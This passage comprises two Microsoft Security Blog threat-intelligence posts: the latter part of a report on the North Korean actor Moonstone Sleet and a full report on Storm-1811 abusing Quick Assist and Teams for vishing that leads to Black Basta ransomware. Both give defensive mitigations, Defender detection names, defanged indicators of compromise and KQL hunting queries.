Moonstone Sleet’s primary goals appear to be espionage and revenue generation. Targeted sectors to date include both individuals and organizations in the software and information technology, education, and defense industrial base sectors.

Software companies and developers

Since early January 2024, Moonstone Sleet has used the above fake software development companies to solicit work or cooperation. This actor has also targeted individuals looking for work in software development, sending candidates a “skills test” that instead delivers malware via a malicious NPM package.

Aerospace

In early December 2023, we observed Moonstone Sleet compromising a defense technology company to steal credentials and intellectual property. In April 2024, the actor ransomed the organization using FakePenny. The same month, we observed Moonstone Sleet compromise a company that makes drone technology. In May 2024, the threat actor compromised a company that makes aircraft parts.

Fitting into the North Korean threat actor landscape

Moonstone Sleet’s diverse set of tactics is notable not only because of their effectiveness, but because of how they have evolved from those of several other North Korean threat actors over many years of activity to meet North Korean cyber objectives. For example, North Korea has for many years maintained a cadre of remote IT workers to generate revenue in support of the country’s objectives. Moonstone Sleet’s pivot to conduct IT work within its campaigns indicates it may not only be helping with this strategic initiative, but possibly also expanding the use of remote IT workers beyond just financial gain. Additionally, Moonstone Sleet’s addition of ransomware to its playbook, like another North Korean threat actor, Onyx Sleet, may suggest it is expanding its set of capabilities to enable disruptive operations. Microsoft reported on Onyx Sleet’s and Storm-0530’s h0lyGhost ransomware in 2022.

Moonstone Sleet’s ability to conduct concurrent operations across multiple campaigns, the robustness of the malicious game, and the use of a custom new ransomware variant are strong indications that this threat actor may be well-resourced. Moreover, given that Moonstone Sleet’s initial attacks mirrored Diamond Sleet methodologies and heavily reused Diamond Sleet’s code in their payloads, Microsoft assesses this actor is equipped with capabilities from prior cyber operations conducted by other North Korean actors.

Microsoft has identified several techniques used by Moonstone Sleet that have previously been used by other North Korean threat actors. For example, since late 2023, an actor that Microsoft tracks as Storm-1877 used malicious npm packages in a campaign targeting software developers with JavaScript-based malware. This campaign was reported publicly by PaloAlto as Contagious Interview. Additionally, in 2023, GitHub reported that Jade Sleet used malicious npm packages in a campaign consisting of fake developer and recruiter personas that operated on LinkedIn, Slack, and Telegram. This shared use of a relatively uncommon tactic across multiple distinct North Korean groups may suggest sharing of expertise and TTPs among North Korean threat actors.

In recent months, Microsoft and other security researchers have reported on North Korean threat actors’ use of software supply chain attacks to conduct widespread malicious operations. In November 2023, Microsoft reported on Diamond Sleet’s supply chain compromise of CyberLink, a multimedia application. While Microsoft has not yet identified any Moonstone Sleet supply chain attacks, the actor has extensively targeted software development firms in its campaigns. Large-scale access to software companies would pose a particularly high risk for future supply chain attacks against those organizations.

Moonstone Sleet’s appearance is an interesting development considering that North Korea has carried out a series of changes in its foreign relations and security apparatus. In November 2023, North Korea closed embassies in several countries, and in March 2024, may have dissolved the United Front Department (UFD), an agency believed to be responsible for reunification and propaganda.

Despite being new, Moonstone Sleet has demonstrated that it will continue to mature, develop, and evolve, and has positioned itself to be a preeminent threat actor conducting sophisticated attacks on behalf of the North Korean regime.

Recommendations

Microsoft recommends the following mitigations defend against attacks by Moonstone Sleet:

• Detect human-operated ransomware attacks with Microsoft Defender XDR. 
• Enable controlled folder access. 
• Ensure that tamper protection is enabled in Microsoft Dender for Endpoint. 
• Enable network protection in Microsoft Defender for Endpoint. 
• Follow the credential hardening recommendations in our on-premises credential theft overview to defend against common credential theft techniques like LSASS access.
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.    
• Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.

Microsoft Defender XDR customers can turn on the following attack surface reduction rule to prevent common attack techniques used by Moonstone Sleet.

• Block executable content from email client and webmail 
• Block executable files from running unless they meet a prevalence, age, or trusted list criterion 
• Use advanced protection against ransomware 
• Block credential stealing from the Windows local security authority subsystem (lsass.exe)

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

• Behavior:Win64/PennyCrypt
• HackTool:Win32/Mimikatz
• HackTool:Win64/Mimikatz
• TrojanDropper:Win32/SplitLoader
• TrojanDropper:Win64/YouieLoad

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network: 

• Moonstone Sleet actor activity detected
• Suspicious activity linked to a North Korean state-sponsored threat actor has been detected
• Diamond Sleet Actor activity detected

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity: 

• Malicious credential theft tool execution detected  
• Mimikatz credential theft tool 
• Ransomware-linked threat actor detected
• Suspicious access to LSASS service

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Detect Procdump dumping LSASS credentials:

DeviceProcessEvents
| where (FileName has_any ("procdump.exe",
"procdump64.exe") and ProcessCommandLine has "lsass") or  
(ProcessCommandLine
has "lsass.exe" and (ProcessCommandLine has "-accepteula"
or ProcessCommandLine contains "-ma"))

Detect connectivity with C2 infrastructure:

let c2servers = dynamic(['mingeloem.com','matrixane.com']);
DeviceNetworkEvents
| where RemoteUrl has_any (c2servers)
| project DeviceId, LocalIP, DeviceName, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp

Detect connectivity to DeTank websites:

let c2servers = dynamic(['detankwar.com','defitankzone.com']);
DeviceNetworkEvents
| where RemoteUrl has_any (c2servers)
| project DeviceId, LocalIP, DeviceName, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel customers can also use the queries below to detect activity detailed in this blog.

This query detects the installation of a Windows service that contains artifacts from credential dumping tools such as Mimikatz:

• Credential Dumping Tools – Service Installation

This query detects the use of Procdump to dump credentials from LSASS memory:

• Dump credential using procdump

Microsoft Sentinel customers can also use the following query, which looks for Microsoft Defender AV detections related to the Moonstone Sleet. In Microsoft Sentinel, the SecurityAlerts table includes only the DeviceName of the affected device. This query joins the DeviceInfo table to connect other information such as device group, IP, signed-in users, etc., allowing analysts to have more context related to the alert, if available:

let MoonStoneSleet_threats = dynamic(["Behavior:Win64/PennyCrypt", "HackTool:Win32/Mimikatz", "HackTool:Win64/Mimikatz ", "TrojanDropper:Win32/SplitLoader", "TrojanDropper:Win64/YouieLoad" ]);
SecurityAlert
| where ProviderName == "MDATP"
| extend ThreatName = tostring(parse_json(ExtendedProperties).ThreatName)
| extend ThreatFamilyName = tostring(parse_json(ExtendedProperties).ThreatFamilyName)
| where ThreatName in~ (MoonStoneSleet_threats) or ThreatFamilyName in~ (MoonStoneSleet_threats)
| extend CompromisedEntity = tolower(CompromisedEntity)
| join kind=inner (
    DeviceInfo
    | extend DeviceName = tolower(DeviceName)
) on $left.CompromisedEntity == $right.DeviceName
| summarize arg_max(TimeGenerated, *) by DisplayName, ThreatName, ThreatFamilyName, PublicIP, AlertSeverity, Description, tostring(LoggedOnUsers), DeviceId, TenantId, CompromisedEntity, ProductName, Entities
| extend HostName = tostring(split(CompromisedEntity, ".")[0]), DomainIndex = toint(indexof(CompromisedEntity, '.'))
| extend HostNameDomain = iff(DomainIndex != -1, substring(CompromisedEntity, DomainIndex + 1), CompromisedEntity)
| project-away DomainIndex
| project TimeGenerated, DisplayName, ThreatName, ThreatFamilyName, PublicIP, AlertSeverity, Description, LoggedOnUsers, DeviceId, TenantId, CompromisedEntity, ProductName, Entities, HostName, HostNameDomain

Indicators of compromise

Malicious files

Moonstone Sleet domains

References

• Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors (Palo Alto Unit 42)
• Security alert: social engineering campaign targets technology industry employees (Github)

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks appeared first on Microsoft Security Blog.

June 2024 update: At the end of May 2024, Microsoft Threat Intelligence observed Storm-1811 using Microsoft Teams as another vector to contact target users. Microsoft assesses that the threat actor uses Teams to send messages and initiate calls in an attempt to impersonate IT or help desk personnel. This activity leads to Quick Assist misuse, followed by credential theft using EvilProxy, execution of batch scripts, and use of SystemBC for persistence and command and control.

Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing (vishing), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware.

Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device.

In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.

Organizations can also reduce the risk of attacks by blocking or uninstalling Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. Additionally, tech support scams are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of social engineering attacks. 

Social engineering

One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller.

For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device. In other cases, threat actors initiate link listing attacks – a type of email bombing attack, where threat actors sign up targeted emails to multiple email subscription services to flood email addresses indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue.

At the end of May 2024, Microsoft observed Storm-1811 using Microsoft Teams to send messages to and call target users. Tenants created by the threat actor are used to impersonate help desk personnel with names displayed as “Help Desk”, “Help Desk IT”, “Help Desk Support”, and “IT Support”. Microsoft has taken action to mitigate this by suspending identified accounts and tenants associated with inauthentic behavior. Apply security best practices for Microsoft Teams to safeguard Teams users.

During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below.

After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting Allow shares the user’s screen with the actor.

Once in the session, the threat actor can select Request Control, which if approved by the target, grants the actor full control of the target’s device.

Follow-on activity leading to Black Basta ransomware

Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.

Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811.

ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.

The mentioned RMM tools are commonly used by threat actors because of their extensive capabilities and ability to blend in with the environment. In some cases, the actors leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence. 

After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement.

In cases where Storm-1811 relies on Teams messages followed by phone calls and remote access through Quick Assist, the threat actor uses BITSAdmin to download batch files and ZIP files from a malicious site, for example antispam3[.]com. Storm-1811 also provides the target user with malicious links that redirect the user to an EvilProxy phishing site to input credentials. EvilProxy is an adversary-in-the-middle (AiTM) phishing kit used to capture passwords, hijack a user’s sign-in session, and skip the authentication process. Storm-1811 was also observed deploying SystemBC, a post-compromise commodity remote access trojan (RAT) and proxy tool typically used to establish command-and-control communication, establish persistence in a compromised environment, and deploy follow-on malware, notably ransomware.

In several cases, Storm-1811 uses PsExec to deploy Black Basta ransomware throughout the network. Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat. In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware.

Recommendations

Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:

• Consider blocking or uninstalling Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment. If your organization utilizes another remote support tool such as Remote Help, block or remove Quick Assist as a best practice. Remote Help is part of the Microsoft Intune Suite and provides authentication and security controls for helpdesk connections.
• Educate users about protecting themselves from tech support scams. Tech support scams are an industry-wide issue where scammers use scary tactics to trick users into unnecessary technical support services.
• Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device.
• If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization.
• Users who have been affected by a tech support scam can also use the Microsoft technical support scam form to report it.

Microsoft recommends the following mitigations to reduce the impact of this threat:

• Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.
• Educate users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls.
• Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft Defender for Office 365 brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.
• Educate Microsoft Teams users to verify ‘External’ tagging on communication attempts from external entities, be cautious about what they share, and never share their account information or authorize sign-in requests over chat.
• Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
• Apply Microsoft’s security best practices for Microsoft Teams to safeguard Teams users.
• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
• Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
• Turn on tamper protection features to prevent attackers from stopping security services.
• Enable investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
• Refer to Microsoft’s human-operated ransomware overview for general hardening recommendations against ransomware attacks.

Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques:

• Block executable files from running unless they meet a prevalence, age, or trusted list criterion
• Block execution of potentially obfuscated scripts
• Block process creations originating from PSExec and WMI commands
• Use advanced protection against ransomware

Detection details

Microsoft Defender Antivirus 

Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:

• TrojanDownloader:O97M/Qakbot
• Trojan:Win32/QBot
• Trojan:Win32/Qakbot
• TrojanSpy:Win32/Qakbot
• Behavior:Win32/Qakbot

Black Basta threat components are detected as the following:

• Behavior:Win32/Basta
• Ransom:Win32/Basta
• Trojan:Win32/Basta

Microsoft Defender Antivirus detects Beacon running on a victim process as the following:

• Behavior:Win32/CobaltStrike
• Backdoor:Win64/CobaltStrike
• HackTool:Win64/CobaltStrike

Additional Cobalt Strike components are detected as the following:

• TrojanDropper:PowerShell/Cobacis
• Trojan:Win64/TurtleLoader.CS
• Exploit:Win32/ShellCode.BN

SystemBC components are detected as:

• Behavior:Win32/SystemBC
• Trojan: Win32/SystemBC

Microsoft Defender for Endpoint

Alerts with the following title in the security center can indicate threat activity on your network:

• Suspicious activity using Quick Assist

The following alerts might also indicate activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

• Suspicious curl behavior
• Suspicious bitsadmin activity
• Suspicious file creation by BITSAdmin tool
• A file or network connection related to a ransomware-linked emerging threat activity group detected —This alert captures Storm-1811 activity
• Ransomware-linked emerging threat activity group Storm-0303 detected — This alert captures some Qakbot distributor activity
• Possible Qakbot activity
• Possible NetSupport Manager activity
• Possibly malicious use of proxy or tunneling tool
• Suspicious usage of remote management software
• Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
• Human-operated attack using Cobalt Strike
• Human-operated attack implant tool detected
• Ransomware behavior detected in the file system

Indicators of compromise

Domain names:

• upd7a[.]com
• upd7[.]com
• upd9[.]com
• upd5[.]pro
• antispam3[.]com
• antispam2[.]com

SHA-256:

• 71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8
• 0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0
• 1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30
• 93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7
• 1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb

ScreenConnect relay:

• instance-olqdnn-relay.screenconnect[.]com

NetSupport C2:

• greekpool[.]com

Cobalt Strike Beacon C2:

• zziveastnews[.]com
• realsepnews[.]com

Advanced hunting 

Microsoft Defender XDR

To locate possible malicious activity, run the following query in the Microsoft Defender portal:

This query looks for possible email bombing activity:

EmailEvents
| where EmailDirection == "Inbound"
| make-series Emailcount = count()
              on Timestamp step 1h by RecipientObjectId
| extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount)
| mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp
| where Anomalies != 0
| where AnomalyScore >= 10

This query looks for possible Teams phishing activity.

let suspiciousUpns = DeviceProcessEvents
| where DeviceId == "alertedMachine"
| where isnotempty(InitiatingProcessAccountUpn)
| project InitiatingProcessAccountUpn;
CloudAppEvents
| where Application == "Microsoft Teams"
| where ActionType == "ChatCreated"
| where isempty(AccountObjectId)
| where RawEventData.ParticipantInfo.HasForeignTenantUsers == true
| where RawEventData.CommunicationType == "OneonOne"
| where RawEventData.ParticipantInfo.HasGuestUsers == false
| where RawEventData.ParticipantInfo.HasOtherGuestUsers == false
| where RawEventData.Members[0].DisplayName in ("Microsoft  Security", "Help Desk", "Help Desk Team", "Help Desk IT", "Microsoft Security", "office")
| where AccountId has "@"
| extend TargetUPN = tolower(tostring(RawEventData.Members[1].UPN))
| where TargetUPN in (suspiciousUpns)

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel also has a range of hunting queries available in Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections. These hunting queries include the following:

Qakbot:

• Qakbot hunting queries

Cobalt Strike:

• Cobalt Strike DNS Beaconing
• Potential ransomware activity related to Cobalt Strike
• Suspicious named pipes
• Cobalt Strike Invocation using WMI

References

• Defense and Mitigations from E-mail Bombing. U.S. Department of Health and Human Services, Health Sector Cybersecurity Coordination Center

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Threat actors misusing Quick Assist in social engineering attacks leading to ransomware appeared first on Microsoft Security Blog.